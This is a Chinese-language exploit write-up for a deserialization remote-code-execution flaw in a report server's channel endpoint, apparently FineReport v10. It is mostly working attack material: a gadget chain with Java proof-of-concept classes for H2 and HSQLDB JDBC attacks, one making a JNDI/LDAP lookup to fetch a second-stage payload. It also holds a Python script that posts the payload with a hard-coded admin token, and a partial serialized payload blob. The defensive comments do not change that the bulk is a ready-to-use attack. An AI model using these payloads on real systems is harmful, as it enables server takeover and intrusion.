某v10 channel 反序列化 出网通杀

漏洞原理

分两块讲,第一个是反序列化点,第二个是绕黑名单的新链子。

Hashtable链

EXP

利用链如下:

Hashtable#readObject -> 
Hashtable#reconstitutionPut ->
AbstractMap#equals ->
TextAndMnemonicHashMap#get ->
com.fr.json.JSONArray#toString -> com.fr.third.alibaba.druid.pool.xa.DruidXADataSource#getXAConnection

函数调用栈

createPhysicalConnection:1826, DruidAbstractDataSource (com.alibaba.druid.pool)
init:936, DruidDataSource (com.alibaba.druid.pool)
getConnection:1473, DruidDataSource (com.alibaba.druid.pool)
getConnection:1469, DruidDataSource (com.alibaba.druid.pool)
getXAConnection:42, DruidXADataSource (com.alibaba.druid.pool.xa)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
serializeAsField:688, BeanPropertyWriter (com.fr.third.fasterxml.jackson.databind.ser)
serializeFields:772, BeanSerializerBase (com.fr.third.fasterxml.jackson.databind.ser.std)
serialize:178, BeanSerializer (com.fr.third.fasterxml.jackson.databind.ser)
serializeContents:119, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
serialize:79, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
serialize:18, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
_serialize:479, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
serializeValue:318, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
_writeValueAndClose:4719, ObjectMapper (com.fr.third.fasterxml.jackson.databind)
writeValueAsString:3964, ObjectMapper (com.fr.third.fasterxml.jackson.databind)
encode:99, EmbedJson (com.fr.json.revise)
encode:560, JSONArray (com.fr.json)
toString:590, JSONArray (com.fr.json)
get:1251, UIDefaults$TextAndMnemonicHashMap (javax.swing)
equals:492, AbstractMap (java.util)
reconstitutionPut:1241, Hashtable (java.util)
readObject:1215, Hashtable (java.util)

EXP(h2 jdbc attack):

package org.example;

import com.alibaba.druid.pool.DruidAbstractDataSource;
import com.alibaba.druid.pool.DruidDataSource;
import com.alibaba.druid.pool.xa.DruidXADataSource;
import com.fr.json.JSONArray;
import utils.ReflectUtils;
import utils.SerializeUtils;


import java.io.*;
import java.util.*;
import java.util.zip.GZIPOutputStream;


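/**
 * Proof-of-concept from the write-up (H2 variant): builds a {@link Hashtable} whose
 * deserialization walks {@code Hashtable#readObject -> reconstitutionPut -> AbstractMap#equals
 * -> UIDefaults$TextAndMnemonicHashMap#get -> JSONArray#toString -> Jackson getter invocation
 * -> DruidXADataSource#getXAConnection}, which opens a JDBC connection to the configured URL.
 * This version is compiled against the upstream {@code com.alibaba.druid} packages.
 *
 * <p>Defensive note: every class in the chain ships with the JDK or the product, so a class-name
 * denylist is a weak control; the check that matters is at the deserialization boundary
 * (ObjectInputFilter, or not deserializing untrusted bytes on the channel endpoint at all).
 */
public class h2Attack {
    /**
     * Builds the serialized {@link Hashtable} payload and, as a local test, deserializes it again.
     *
     * @param args ignored
     * @throws Exception on reflection or serialization failure
     */
    public static void main(String[] args) throws Exception {
        // H2 in-memory JDBC URL whose init= clause is executed when the connection is opened.
        String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                "java.lang.Runtime.getRuntime().exec('open -a calculator')\n" +
                "$$\n";

        DruidXADataSource druidXADataSource = new DruidXADataSource();
        // logWriter and statLogger do not implement Serializable; nulling them keeps
        // ObjectOutputStream from throwing NotSerializableException while writing the object.
        druidXADataSource.setLogWriter(null);
        druidXADataSource.setStatLogger(null);
        // With initialSize > 0, DruidDataSource#init reaches createPhysicalConnection() before
        // it would dereference initedLatch (null after deserialization) in await().
        druidXADataSource.setInitialSize(1);
        druidXADataSource.setUrl(url);

        // Calling the getter directly reaches the same connection code path:
        // druidXADataSource.getXAConnection();

        // JSONArray#toString delegates to Jackson's writeValueAsString (serialization), whose
        // bean serializer invokes every getter of the contained object -- including getXAConnection().
        ArrayList<Object> arrayList = new ArrayList<>();
        arrayList.add(druidXADataSource);

        JSONArray objects = new JSONArray(arrayList);
        // objects.toString();

        // allocateInstance skips the constructor, so HashMap.loadFactor is still 0 here;
        // it is patched by reflection below, otherwise HashMap#readObject rejects the map.
        Map textAndMnemonicHashMap1 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));
        Map textAndMnemonicHashMap2 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));

        // The JSONArray is the key, so TextAndMnemonicHashMap#get(key) ends in key.toString().
        // Distinct values first: the two maps then hash differently, so Hashtable#put below does
        // not reach AbstractMap#equals and the chain does not fire while the payload is built.
        textAndMnemonicHashMap1.put(objects,"jasper");
        textAndMnemonicHashMap2.put(objects,"n1ght");

        // transactionHistogram is not discussed in the write-up -- presumably also non-serializable.
        ReflectUtils.setClassFieldValue(DruidAbstractDataSource.class,"transactionHistogram",druidXADataSource,null);
        ReflectUtils.setClassFieldValue(DruidDataSource.class,"initedLatch",druidXADataSource,null);
        // HashMap#readObject throws on a load factor of 0 (the "0.0" error the write-up mentions).
        ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap1,1);
        ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap2,1);

        Hashtable<Object, Object> hashtable = new Hashtable<>();
        hashtable.put(textAndMnemonicHashMap1,1);
        hashtable.put(textAndMnemonicHashMap2,1);

        // Now make both maps hash-equal: on readObject, reconstitutionPut sees matching hashes for
        // the second entry and calls AbstractMap#equals, which calls get() on the other map.
        textAndMnemonicHashMap1.put(objects,null);
        textAndMnemonicHashMap2.put(objects,null);


        String payload = SerializeUtils.serializeBase64(hashtable);
        // System.out.println(gzipWrapper(payload));
        // Local round trip: deserializing here runs the chain on this machine.
        SerializeUtils.unserializeBase64(payload);
    }

    /**
     * Re-encodes a Base64 string as Base64(GZIP(decoded bytes)).
     *
     * @param base64String Base64 text to decode, compress and re-encode
     * @return the gzip-compressed bytes, Base64-encoded
     * @throws IllegalArgumentException if {@code base64String} is not valid Base64
     * @throws Exception if compression fails
     */
    public static String gzipWrapper(String base64String) throws Exception {
        byte[] bytes = Base64.getDecoder().decode(base64String);
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        // try-with-resources closes the stream; close() writes the GZIP trailer (as finish() did)
        // and no longer leaks the deflater.
        try (GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos)) {
            gzipOutputStream.write(bytes);
        }
        return Base64.getEncoder().encodeToString(baos.toByteArray());
    }
}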

问题一:为什么要设置setter

setUrl最简单,因为要触发jdbc attack,而其他三个setter的作用则要分析一下

druidXADataSource.setLogWriter(null);
druidXADataSource.setStatLogger(null);
druidXADataSource.setInitialSize(1);
druidXADataSource.setUrl(url);

setLogWriter(null)、setStatLogger(null)是因为:DruidXADataSource对象被序列化时会递归序列化其所有fields,而其中的logWriter和statLogger并未实现Serializable接口,递归序列化到它们时会抛出NotSerializableException;设置成null后就不会再判断该字段是否可序列化,也就bypass了。

断点打在ObjectOutputStream#1548,条件断点寻找所有未实现Serializable接口的Field:

objVals[i] != null && (obj.hashCode() == 509886383) && !(objVals[i] instanceof Serializable)

setInitialSize(1)的原因则和反序列化有关。首先测试可以发现,直接调用getXAConnection()是可以打通的,但是通过反序列化调用就打不通了,于是开始对比分析:

直接调用 getXAConnection 触发jdbc attack的调用栈如下:

getConnectionInternal:1674, DruidDataSource (com.alibaba.druid.pool)
getConnectionDirect:1504, DruidDataSource (com.alibaba.druid.pool)
getConnection:1484, DruidDataSource (com.alibaba.druid.pool)
getConnection:1469, DruidDataSource (com.alibaba.druid.pool)
getXAConnection:42, DruidXADataSource (com.alibaba.druid.pool.xa)
main:34, h2Attack (org.example)

而反序列化去触发jdbc attack时,在DruidDataSource#init中,原本在构造函数里初始化了的this.initedLatch变成了null(反序列化不会执行构造函数,payload里也显式把它置为了null),这导致它在调用await函数时抛出空指针异常

而如果this.init()过不去,自然就无法执行到this.getConnectionDirect(),也就导致反序列化无法和直接调用getXConnection一样触发jdbc attack,如下图所示

解决方案是druidXADataSource.setInitialSize(1),同样是在this.init()函数里,在调用this.initedLatch.await()之前存在下面的代码段,原本这个while循环因为条件不符直接跳过,但是如果设置了initialSize,则可以执行到this.createPhysicalConnection(),而这个函数同样可以打jdbc attack(这里比较奇特,不太清楚怎么发现的)

调用栈如下:

createPhysicalConnection:1694, DruidAbstractDataSource (com.alibaba.druid.pool)
createPhysicalConnection:1794, DruidAbstractDataSource (com.alibaba.druid.pool)
init:936, DruidDataSource (com.alibaba.druid.pool)
getConnection:1473, DruidDataSource (com.alibaba.druid.pool)
getConnection:1469, DruidDataSource (com.alibaba.druid.pool)
getXAConnection:42, DruidXADataSource (com.alibaba.druid.pool.xa)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
serializeAsField:688, BeanPropertyWriter (com.fr.third.fasterxml.jackson.databind.ser)
serializeFields:772, BeanSerializerBase (com.fr.third.fasterxml.jackson.databind.ser.std)
serialize:178, BeanSerializer (com.fr.third.fasterxml.jackson.databind.ser)
serializeContents:119, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
serialize:79, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
serialize:18, IndexedListSerializer (com.fr.third.fasterxml.jackson.databind.ser.impl)
_serialize:479, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
serializeValue:318, DefaultSerializerProvider (com.fr.third.fasterxml.jackson.databind.ser)
_writeValueAndClose:4719, ObjectMapper (com.fr.third.fasterxml.jackson.databind)
writeValueAsString:3964, ObjectMapper (com.fr.third.fasterxml.jackson.databind)
encode:99, EmbedJson (com.fr.json.revise)
encode:560, JSONArray (com.fr.json)
toString:590, JSONArray (com.fr.json)
get:1251, UIDefaults$TextAndMnemonicHashMap (javax.swing)
equals:492, AbstractMap (java.util)
reconstitutionPut:1241, Hashtable (java.util)
readObject:1215, Hashtable (java.util)

问题二:为什么Map前后put两次

和CC7类似,textAndMnemonicHashMap在hashtable.put的前后各put了一次,并且value先不同后相同

textAndMnemonicHashMap1.put(objects,"jasper");  
textAndMnemonicHashMap2.put(objects,"n1ght");
...略
hashtable.put(textAndMnemonicHashMap1,1);
hashtable.put(textAndMnemonicHashMap2,1);
...略
textAndMnemonicHashMap1.put(objects,null);
textAndMnemonicHashMap2.put(objects,null);

这样构造本质还是因为hashtable.readObject触发的reconstitutionPut,简单说reconstitutionPut方法就是把一个个反序列化后的Map存入tab,而存入时自然会判断是否有冲突,于是使用hash和equals来做判断,我们利用的也是这个点。

目标是执行到AbstractMap#equals,但在此之前需要判断e.hash和key.hashCode()是否相等,只有相等才能走到equals

而key.hashCode()实际上就是 key.hash ^ value.hash(AbstractMap#hashCode对每个entry取key与value的hashCode异或后再求和),而e.hash则是上一个存入tab的textAndMnemonicHashMap1的key.hashCode(),那么想执行equals就需要两个Map的key和value一致,这就解释了payload最后为什么把两个value都设置为null。

在设置两个null之前,value先设置成不同的值,则是为避免提前触发链子,因为hashtable在put时会触发同样的equals

问题三:为什么设置loadFactor

因为不加会报错,错误提示中给出的load factor是0.0:用allocateInstance创建的实例没有执行构造函数,loadFactor字段仍是默认值0,而HashMap#readObject会拒绝这样的值

这个调试一下就知道了,不加loadFactor没办法反序列化= =

HashMap链

漏洞利用

hsql

v10的最新版默认内置hsql和jdk8u191,所以考虑打hsql jdbc attack:通过hsql调用Java静态函数(InitialContext.doLookup)去打jndi;又因为是高版本jdk,所以再打ldap反序列化,这样反序列化就不受 blacklist.txt 限制,黑名单里随便找个链子反序列化即可。

坑点:

  1. 指定的hsql数据库的目录必须存在且有权限写文件,并且之前最好没写过数据
  2. 现成工具无法直接利用,因为官方包和fr开头的包不一样,这里魔改 JNDIMap,把fr包打进去实现利用
  3. 最新的v10不带BeanUtils了,这里我用的jackson

exp

package org.example;

import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fr.json.JSONArray;
import utils.ReflectUtils;
import utils.SerializeUtils;

import java.io.*;
import java.util.*;
import java.util.zip.GZIPOutputStream;


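/**
 * Proof-of-concept from the write-up (HSQLDB variant): the same {@link Hashtable} gadget chain as
 * the H2 version ({@code Hashtable#readObject -> ... -> JSONArray#toString -> Jackson getter
 * -> DruidXADataSource#getXAConnection}), but the JDBC URL selects the bundled HSQLDB driver and
 * the validation query performs a JNDI lookup against the listener named in {@code ldapPld}.
 * Compiled against the shaded {@code com.fr.third.alibaba.druid} / {@code com.fr.third.org.hsqldb}
 * packages rather than the upstream ones (the write-up notes that the package names differ).
 *
 * <p>Defensive note: every class in the chain ships with the JDK or the product, so a class-name
 * denylist is a weak control; the boundary that matters is deserialization of untrusted bytes on
 * the channel endpoint (ObjectInputFilter, or not deserializing at all). Outbound LDAP/JDBC
 * connections initiated by the server are the observable signal of this chain.
 */
public class HdqlAttack {
    /**
     * Builds the serialized {@link Hashtable} payload and prints it gzip-compressed and Base64-encoded.
     *
     * @param args ignored
     * @throws Exception on reflection or serialization failure
     */
    public static void main(String[] args) throws Exception {
        // LDAP URL of a local listener (127.0.0.1:1389); the path is interpreted by that listener.
        String ldapPld = "ldap://127.0.0.1:1389/Deserialize/FineReportJackson/Command/open .";
        // HSQLDB SQL that calls a Java static method -- here InitialContext.doLookup(ldapPld).
        String query = "call \"javax.naming.InitialContext.doLookup\"('"+ ldapPld + "');";
        // File-based HSQLDB database; the write-up notes the directory must exist and be writable.
        String url = "jdbc:hsqldb:file:/Users/jasper/Downloads/test/";
        DruidXADataSource druidXADataSource = new DruidXADataSource();

        // logWriter and statLogger do not implement Serializable; nulling them keeps
        // ObjectOutputStream from throwing NotSerializableException while writing the object.
        druidXADataSource.setLogWriter(null);
        druidXADataSource.setStatLogger(null);
        // With initialSize > 0, DruidDataSource#init reaches createPhysicalConnection() before
        // it would dereference initedLatch (null after deserialization) in await().
        druidXADataSource.setInitialSize(1);

        // Presumably executed when Druid validates the freshly created connection -- the write-up
        // does not trace this step.
        druidXADataSource.setValidationQuery(query);
        druidXADataSource.setUrl(url);
        // Shaded HSQLDB driver bundled with the product.
        druidXADataSource.setDriverClassName("com.fr.third.org.hsqldb.jdbcDriver");

        // Calling the getter directly reaches the same connection code path:
        // druidXADataSource.getXAConnection();
        // JSONArray#toString delegates to Jackson's writeValueAsString (serialization), whose
        // bean serializer invokes every getter of the contained object -- including getXAConnection().

        ArrayList<Object> arrayList = new ArrayList<>();
        arrayList.add(druidXADataSource);

        JSONArray objects = new JSONArray(arrayList);
        // objects.toString();

        // allocateInstance skips the constructor, so HashMap.loadFactor is still 0 here;
        // it is patched by reflection below, otherwise HashMap#readObject rejects the map.
        Map textAndMnemonicHashMap1 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));
        Map textAndMnemonicHashMap2 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));

        // The JSONArray is the key, so TextAndMnemonicHashMap#get(key) ends in key.toString().
        // Distinct values first: the two maps then hash differently, so Hashtable#put below does
        // not reach AbstractMap#equals and the chain does not fire while the payload is built.
        textAndMnemonicHashMap1.put(objects,"yy");
        textAndMnemonicHashMap2.put(objects,"zZ");

        // transactionHistogram is not discussed in the write-up -- presumably also non-serializable.
        ReflectUtils.setClassFieldValue(DruidAbstractDataSource.class,"transactionHistogram",druidXADataSource,null);
        ReflectUtils.setClassFieldValue(DruidDataSource.class,"initedLatch",druidXADataSource,null);
        // HashMap#readObject throws on a load factor of 0 (the "0.0" error the write-up mentions).
        ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap1,1);
        ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap2,1);

        Hashtable<Object, Object> hashtable = new Hashtable<>();
        hashtable.put(textAndMnemonicHashMap1,1);
        hashtable.put(textAndMnemonicHashMap2,1);

        // Now make both maps hash-equal: on readObject, reconstitutionPut sees matching hashes for
        // the second entry and calls AbstractMap#equals, which calls get() on the other map.
        textAndMnemonicHashMap2.put(objects,null);
        textAndMnemonicHashMap1.put(objects,null);


        String payload = SerializeUtils.serializeBase64(hashtable);
        System.out.println(gzipWrapper(payload));
        // Local round trip (disabled here): deserializing would run the chain on this machine.
        // SerializeUtils.unserializeBase64(payload);
    }

    /**
     * Re-encodes a Base64 string as Base64(GZIP(decoded bytes)).
     *
     * @param base64String Base64 text to decode, compress and re-encode
     * @return the gzip-compressed bytes, Base64-encoded
     * @throws IllegalArgumentException if {@code base64String} is not valid Base64
     * @throws Exception if compression fails
     */
    public static String gzipWrapper(String base64String) throws Exception {
        byte[] bytes = Base64.getDecoder().decode(base64String);
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        // try-with-resources closes the stream; close() writes the GZIP trailer (as finish() did)
        // and no longer leaks the deflater.
        try (GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos)) {
            gzipOutputStream.write(bytes);
        }
        return Base64.getEncoder().encodeToString(baos.toByteArray());
    }
}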

h2

h2 jdbc attack直接rce,直接上exp

package org.example;

import com.alibaba.druid.pool.DruidAbstractDataSource;
import com.alibaba.druid.pool.DruidDataSource;
import com.alibaba.druid.pool.xa.DruidXADataSource;
import com.fr.json.JSONArray;
import utils.ReflectUtils;
import utils.SerializeUtils;


import java.io.*;
import java.util.*;
import java.util.zip.GZIPOutputStream;


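/**
 * Proof-of-concept from the write-up (H2 variant, payload-printing version): builds a
 * {@link Hashtable} whose deserialization walks {@code Hashtable#readObject -> reconstitutionPut
 * -> AbstractMap#equals -> UIDefaults$TextAndMnemonicHashMap#get -> JSONArray#toString -> Jackson
 * getter invocation -> DruidXADataSource#getXAConnection}, which opens a JDBC connection to the
 * configured URL. Compiled against the upstream {@code com.alibaba.druid} packages.
 *
 * <p>Defensive note: every class in the chain ships with the JDK or the product, so a class-name
 * denylist is a weak control; the check that matters is at the deserialization boundary
 * (ObjectInputFilter, or not deserializing untrusted bytes on the channel endpoint at all).
 */
public class h2Attack {
    /**
     * Builds the serialized {@link Hashtable} payload, prints it gzip-compressed and Base64-encoded,
     * and deserializes it again as a local test.
     *
     * @param args ignored
     * @throws Exception on reflection or serialization failure
     */
    public static void main(String[] args) throws Exception {
        // H2 in-memory JDBC URL whose init= clause is executed when the connection is opened.
        String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                "java.lang.Runtime.getRuntime().exec('open -a calculator')\n" +
                "$$\n";

        DruidXADataSource druidXADataSource = new DruidXADataSource();
        // logWriter and statLogger do not implement Serializable; nulling them keeps
        // ObjectOutputStream from throwing NotSerializableException while writing the object.
        druidXADataSource.setLogWriter(null);
        druidXADataSource.setStatLogger(null);
        // With initialSize > 0, DruidDataSource#init reaches createPhysicalConnection() before
        // it would dereference initedLatch (null after deserialization) in await().
        druidXADataSource.setInitialSize(1);
        druidXADataSource.setUrl(url);
        // Calling the getter directly reaches the same connection code path:
        // druidXADataSource.getXAConnection();
        // JSONArray#toString delegates to Jackson's writeValueAsString (serialization), whose
        // bean serializer invokes every getter of the contained object -- including getXAConnection().

        ArrayList<Object> arrayList = new ArrayList<>();
        arrayList.add(druidXADataSource);

        JSONArray objects = new JSONArray(arrayList);
        // objects.toString();

        // allocateInstance skips the constructor, so HashMap.loadFactor is still 0 here;
        // it is patched by reflection below, otherwise HashMap#readObject rejects the map.
        Map textAndMnemonicHashMap1 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));
        Map textAndMnemonicHashMap2 = (Map) ReflectUtils.getUnsafe().allocateInstance(Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap"));

        // The JSONArray is the key, so TextAndMnemonicHashMap#get(key) ends in key.toString().
        // Distinct values first: the two maps then hash differently, so Hashtable#put below does
        // not reach AbstractMap#equals and the chain does not fire while the payload is built.
        textAndMnemonicHashMap1.put(objects,"jasper");
        textAndMnemonicHashMap2.put(objects,"n1ght");

        // transactionHistogram is not discussed in the write-up -- presumably also non-serializable.
        ReflectUtils.setClassFieldValue(DruidAbstractDataSource.class,"transactionHistogram",druidXADataSource,null);
        ReflectUtils.setClassFieldValue(DruidDataSource.class,"initedLatch",druidXADataSource,null);
        // HashMap#readObject throws on a load factor of 0 (the "0.0" error the write-up mentions).
        ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap1,1);
        ReflectUtils.setClassFieldValue(HashMap.class,"loadFactor",textAndMnemonicHashMap2,1);

        Hashtable<Object, Object> hashtable = new Hashtable<>();
        hashtable.put(textAndMnemonicHashMap1,1);
        hashtable.put(textAndMnemonicHashMap2,1);

        // Now make both maps hash-equal: on readObject, reconstitutionPut sees matching hashes for
        // the second entry and calls AbstractMap#equals, which calls get() on the other map.
        textAndMnemonicHashMap1.put(objects,null);
        textAndMnemonicHashMap2.put(objects,null);

        String payload = SerializeUtils.serializeBase64(hashtable);
        //// System.out.println(payload);
        System.out.println(gzipWrapper(payload));
        // Local round trip: deserializing here runs the chain on this machine.
        SerializeUtils.unserializeBase64(payload);
    }

    /**
     * Re-encodes a Base64 string as Base64(GZIP(decoded bytes)).
     *
     * @param base64String Base64 text to decode, compress and re-encode
     * @return the gzip-compressed bytes, Base64-encoded
     * @throws IllegalArgumentException if {@code base64String} is not valid Base64
     * @throws Exception if compression fails
     */
    public static String gzipWrapper(String base64String) throws Exception {
        byte[] bytes = Base64.getDecoder().decode(base64String);
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        // try-with-resources closes the stream; close() writes the GZIP trailer (as finish() did)
        // and no longer leaks the deflater.
        try (GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos)) {
            gzipOutputStream.write(bytes);
        }
        return Base64.getEncoder().encodeToString(baos.toByteArray());
    }
}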

发送脚本

import base64
import requests
import urllib3

def cmd(host: str) -> None:
    """Post the serialized payload to ``host``'s channel endpoint and print a verdict.

    Only the HTTP status is inspected: a 200 response is reported as vulnerable and
    any exception -- including timeouts and connection errors -- as not vulnerable,
    so an unreachable host is indistinguishable from a patched one.  TLS certificate
    verification is disabled (``verify=False``); ``urllib3`` is imported at module
    level but never used, so nothing silences the resulting InsecureRequestWarning.

    Args:
        host: scheme and host of the target (e.g. ``http://localhost:8075``), no trailing slash.
    """
    try:
        url = host + "/webroot/decision/remote/design/channel"
        headers = {
            "Content-Type": "application/octet-stream",
            # NOTE(review): hard-coded JWT; it carries exp/iat claims, so presumably it
            # stops being accepted once expired -- confirm against the target.
            "token": "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsInRlbmFudElkIjoiZGVmYXVsdCIsImlzcyI6ImZhbnJ1YW4iLCJkZXNjcmlwdGlvbiI6ImFkbWluKGFkbWluKSIsImV4cCI6MTcyMzEzNDgxNiwiaWF0IjoxNzIzMTMxMjE5LCJqdGkiOiJpYnFtcVNSek94RmYrQ3JnUzlXeG5NMDdqT3BYVWF4RHV0czMvNGpTKzBqdGlCSzcifQ.x0xKCO4bR6EVGqEoI7W4es7aRWPn5idSTeOYBleBumM",
            "username": "admin"
        }
        ## h2 jdbc attack rce

        ## b = b"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